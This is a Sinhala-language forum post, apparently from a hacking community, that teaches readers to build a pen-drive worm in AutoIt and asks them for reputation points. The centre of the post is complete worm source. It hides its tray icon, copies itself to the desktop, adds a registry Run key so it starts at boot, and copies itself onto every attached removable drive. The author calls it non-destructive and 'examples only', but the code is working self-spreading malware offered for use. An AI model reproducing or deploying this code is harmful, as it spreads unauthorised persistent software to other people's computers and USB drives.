AutoIt වලින් පෙන් වෝර්ම් කට්ටක් හදමු
අදත් කියල දෙන්නම් පොඩි කෝර්ඩ් එකක් මම ඔයාලට මේ දැනුම දෙන්නෙ නරකට යොදා ගන්න නෙවෙයි හොද පැත්තකට යොදවන්න කියල උදාහරණයක් විදියට වයිරස් ගාර්ඩ් හදන්නෙත් වයිරස් ගැන හොදට දන්න කියන කට්ටිය කලින් මතකද මම පොඩි වෝර්ම් එකක් හදන්න කියල දුන්න රෙප් වලින් මට ගොඩක් අය බැන්න සමහර විට ඒ සුද්දන්ට දෙන අය උන් කැමති නෑ අපේ එකෙක් කොර්ඩ් පැත්තකින් ඉස්සරහට එනවට
ඇත්තම කියනව නම් පොඩි කාලෙ මට ගොඩක් ආසාව තිබුනෙ කවද හරි වයිරස් කට්ටක් හදන්න ඉතින් ඔහොම යනකොට කෝර්ඩ් පැත්තට ආස හිතුන වැරදුන වාර අනන්තයි එකම වැරද්ද දෙසැරයක් කරෙ නම් නෑ
ඔන්න කට්ටිය හිතන්න එපා මෙන්න මුට පිස්සු මුගෙ ජීවන කතාව කියවනව කියල එහෙම හිතන්න එපා වැඩි කතා එපා.මම කෙලින්ම කෝර්ඩ් එක දෙන්නම් මූලික දැනුම කලින් කලින් වෝර්ම් එකේ තියනව!
මෙන්න කෝර්ඩ් එක මේක ඇවිල්ල පෙන් එකකට කොපි වෙන්න සරලව කිව්වොත් වෝර්ම් කට්ටක් (චෙක් කරල බලන්න විනාශකාරී ක්රියාවන් අන්තර් ගත නැත උදාහරණ පමනි!)
Opt("TrayIconHide", 1)
FileCopy(@ScriptFullPath,@DesktopDir & "\"&@MSEC&"Dragon3rz.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run","Dragon3rz", "REG_SZ", @ScriptFullPath)
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
For $i = 1 to $var[0]
FileCopy(@ScriptFullPath,$var[$i])
Next
EndIf
sleep(5000)
MsgBox(4096,"ado","yaman bando wesak balanna!")
$i = 0
Do

Sleep(5000)
$i = $i + 1
Until $i = 20
වැඩේ හොදයි නම් රෙප් පාරක් දෙන්න වැඩේ නරත නම් රෙප් කපන්න කට්ටිය අකමැති නම් ආයෙමත් මම මේ දේවල් ඔයලට කියල දෙන්නෙ නෑ මේක නවත්තනව.
(උපුටා ගෙන අතන මෙතන දාන්න නම් තහනම් ඔං කිව්වා)
අනිත් අයට බලන්න බම්ප් දමන්න කමෙන්ට් දෙන්න!
ඔබ සැමට ස්තූතියි!නැවත හමු වෙමු!

Last edited: